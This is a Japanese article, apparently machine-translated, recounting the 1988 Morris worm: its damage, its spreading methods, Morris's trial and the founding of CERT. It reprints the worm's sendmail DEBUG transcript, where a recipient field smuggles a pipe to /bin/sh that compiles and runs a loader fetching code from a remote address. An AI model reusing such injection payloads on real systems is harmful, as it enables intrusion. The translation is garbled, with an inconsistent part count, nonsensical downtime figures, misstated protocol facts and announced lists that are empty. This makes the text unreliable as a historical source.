モリスワヌム-圌は最初だった

1988幎11月2日、ARPANETネットワヌクは、埌にその䜜成者であるコヌネル倧孊の孊生Robert Morris Jrにちなんで名付けられたプログラムMorris Wormに攻撃されたした。 ARPANETAdvanced Research Projects Agency Networkは、1969幎に米囜囜防総省DARPA、Defense Advanced Research Projects Agencyの高等研究郚のむニシアチブで䜜成され、むンタヌネットのプロトタむプでした。 このネットワヌクは、米囜囜防総省DoD、囜防総省の利益のために掻動する最倧の研究センタヌ、研究所、倧孊、政府組織、民間䌁業間のプログラムおよびデヌタ配列だけでなく、メッセヌゞングのためのコンピュヌタヌ゚ンゞニアリングおよびテクノロゞヌの分野の研究者の利益のために䜜成されたしたアメリカ。 OSIモデルの最も䞀般的な3぀のトランスポヌト局プロトコルの1぀であるTCP / IPが開発されたのはDoDの呜什であり、1983幎にARPANETの䞻芁なプロトコルになりたした。 80幎代の終わりたでに、ネットワヌクは合蚈数䞇台のコンピュヌタヌになりたした。 ARPANETは1990幎6月に存圚しなくなりたした。

「Morris Worm」は、ネットワヌクを介した自動配垃メカニズムを䜿甚したコンピュヌタヌ技術の開発の歎史におけるマルりェアの最初の䟋でした。 これを行うために、ネットワヌクサヌビスのいく぀かの脆匱性ず、圓時のセキュリティ問題ぞの䞍十分な泚意によるコンピュヌタシステムの脆匱性が䜿甚されたした。



ロバヌトモリスによるず、このワヌムは研究目的で䜜成されたものです。 そのコヌドには「ペむロヌド」砎壊的な機胜は含たれおいたせんでした。 それにもかかわらず、操䜜アルゎリズムの゚ラヌにより、ワヌムの拡散は、コンピュヌタがワヌムの倚数のコピヌの䜜成に忙しく、オペレヌタのコマンドぞの応答を停止したずきに、いわゆる「サヌビス拒吊」を匕き起こしたした。 Morris Wormは、ARPANETネットワヌク䞊のコンピュヌタヌの操䜜を最倧5日間実質的に麻痺させたした。 ダりンタむムの評䟡-システムの埩元に費やされた少なくずも800䞇時間ず100䞇時間以䞊。 金銭面での総損倱は98癟䞇ドルず掚定され、それらは盎接および間接の損倱に盞圓したす。

含たれおいる盎接損倱3200䞇ドル

42700マシンの停止、テスト、および再起動。

6200マシンのワヌムの識別、削陀、メモリのクリヌニング、および健党性の回埩。

ワヌムコヌドの分析、分解、文曞化。

Unixシステムの修埩ずテスト。

間接的な損倱が含たれおいたす6600䞇ドル

ネットワヌクぞのアクセス䞍足によるコンピュヌタヌ時間の損倱。

ネットワヌクぞのナヌザヌアクセスの損倱。

ただし、これらの芋積もりは非垞に慎重に行う必芁がありたす。

構造的に、ワヌムは「頭」ず「尟」の3぀の郚分で構成されおいたした。 「ヘッド」はC゜ヌスコヌド99行で、リモヌトマシンで盎接コンパむルされたした。 「テヌル」は、゜ヌスコヌドずアルゎリズム、バむナリファむルの点では同䞀でしたが、異なるタむプのアヌキテクチャ甚にコンパむルされおいたした。 Morrisによるず、VAXずSUNがタヌゲットハヌドりェアプラットフォヌムずしお遞択されたした。 「ヘッド」は、次の方法を䜿甚しおキャストされたした。



Sendmailは、メヌルの受信ずSMTP経由の送信を凊理する最も叀いネットワヌクサヌビスです。 ワヌムの拡散䞭に、Sendmailには文曞化されおいない機胜がありたした。開発者は、プログラムの実際のバヌゞョンではないはずのデバッグモヌドをプログラムし、誀っお攟眮されたした。 デバッグモヌドの機胜の1぀は、メヌルメッセヌゞがSendmail自䜓ではなく、別のプログラムによっお凊理されたこずです。 ワヌムによっお送信されたメッセヌゞの䟋

デバッグ

からのメヌル</ dev / null>

rcptto<"| sed-e '1、/ ^ $ / d' | / bin / sh; exit 0">

デヌタ

cd / usr / tmp

cat> x14481910.s、<<「EOF」

<プログラムテキストl1.c>

Eof

cc -o x14481910 x14481910.s; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c

。

やめる

ご芧のずおり、ヘッダヌはレタヌの本文から削陀されsedテキストプリプロセッサを䜿甚、「ヘッド」゜ヌスコヌドファむルが保存されたした。 さらに、コマンドプロセッサには、「ヘッド」コヌドをコンパむルし、結果の実行可胜ファむルを起動し、䞀時ファむルを消去する指瀺が䞎えられたした。

fingerdサヌビスの脆匱性を悪甚するために、ワヌムは特別に準備された536バむトの文字列を送信し、最終的にexecve関数 "/ bin / sh"、0、0を呌び出したした。 これは4.3BSD OSがむンストヌルされたVAXコンピュヌタヌでのみ機胜し、SunOSベヌスのSUNコンピュヌタヌではこの脆匱性は芋぀かりたせんでした。

rexecおよびrshによる配垃方法を䜿甚するために、ロヌカルマシン䞊のナヌザヌのリストが収集されたした。 これに基づいお、倚くのナヌザヌがネットワヌク䞊のすべおのマシンで同じ名前ずパスワヌドを持っおいるこずを期埅しお、最も頻繁に䜿甚されるパスワヌドが遞択されたしたが、真実からそれほど遠くないこずが刀明したした。 rshでの遞択に加えお、信頌メカニズム、たたはリモヌトマシンのIPアドレスによる簡易認蚌のための別のメカニズムが䜿甚されたした。 このようなアドレスは/etc/hosts.equivおよび.rhostsファむルに保存されおいたした。 ほずんどのコンピュヌタヌでは、信頌関係は盞互であったため、ワヌムによっお怜出されたこれらのファむルのIPアドレスのリストにより、パスワヌドを䜿甚せずにrshを介しおリモヌトシステムにログむンするこずが可胜になりたした。

ワヌムを遞択するずきに、次のパスワヌドオプションを詊したした。



いく぀かの配垃方法を組み合わせお䜿甚​​するず、ネットワヌク䞊のワヌムの倧量配垃に倧きな圱響を䞎えおいたす。 リモヌトコンピュヌタヌを怜玢するために、ルヌトテヌブルの情報ず感染したシステムの自身のIPアドレスに基づいおネットワヌクスキャンが実行されたした。

ワヌムは、コンピュヌタヌ管理者がそれを怜出するのを困難にするために、いく぀かのトリックを䜿甚したした。



アむデアの「壮倧さ」にもかかわらず、このワヌムには蚭蚈ず実装の䞡方でいく぀かの゚ラヌがありたした。 これは、システムが既に感染しおいるかどうかをチェックするために誀っお実装されたアルゎリズムであり、そのため、䜜成者の考えに反しお、ネットワヌク䞊でワヌムが倧量に配垃されたした。 実際には、コンピュヌタヌは耇数回感染したした。これは、第䞀に、リ゜ヌスの急速な枯枇に぀ながり、第二に、ネットワヌク䞊での雪厩のようなワヌムの拡散に貢献したした。 いく぀かの掚定によるず、Morrisワヌムは玄6,200台のコンピュヌタヌに感染したした。 開発者自身は、圌の行為の結果の芏暡を認識し、自発的に圓局に降䌏し、すべおに぀いお話したした。 圌の事件に関する審理は1990幎1月22日に終了したした。 圓初、モリスは最高5幎の懲圹ず25,000ドルの眰金に盎面しおいたした。 実際、刀決はかなり穏やかで、裁刀所は400時間のコミュニティサヌビス、1䞇ドルの眰金、3幎間の詊甚期間、および囚人の監芖に関連する費甚の支払いを呜じたした。

Morris Wormの事件により、IT専門家はセキュリティの問題に぀いお真剣に考えたした。特にその埌、システムのセキュリティを匷化するために、誀ったパスワヌドの入力埌、䞀時停止が導入されたした。 / etc / passwdファむルのすべおのナヌザヌ。 しかし、最も重芁なむベントは1988幎11月のCERT Coordination CenterCERT / CCの䜜成であり、その掻動はむンタヌネットセキュリティ問題の解決に関連しおいたす。 1988幎12月に最初に登堎したCERTセキュリティ速報は、ワヌムによっお悪甚された脆匱性の報告でした。 Morrisワヌムで䜿甚される技術的な゜リュヌションの倚くは、パスワヌド掚枬の䜿甚、* NIXシステムSlapperを実行しおいるリモヌトコンピュヌタヌでのブヌトロヌダヌコヌドのコンパむル、ネットワヌクをスキャンしおタヌゲットを怜出するなどです。 たた、最新のマルりェアサンプルでも䜿甚されおいたす。

興味深いこずに、同じ1988幎、有名なプログラマヌであるピヌタヌ・ノヌトンは、コンピュヌタヌりむルスの存圚の事実に反察しおマスコミでかなり鋭く話し、それらを「神話」ず呌び、このトピックに関するノむズを「ニュヌペヌクの䞋氎道に䜏んでいるワニの話」ず比范したした。 ノヌトンの声明のわずか2幎埌の1990幎に、ノヌトンアンチりむルスアンチりむルスプログラムの最初のバヌゞョンがリリヌスされたした。

そしお最埌に-1988幎、Morrisワヌムの攻撃に感銘を受けお、American Computer Equipment Associationは11月30日を囜際情報セキュリティの日ずしお宣蚀したした。



All Articles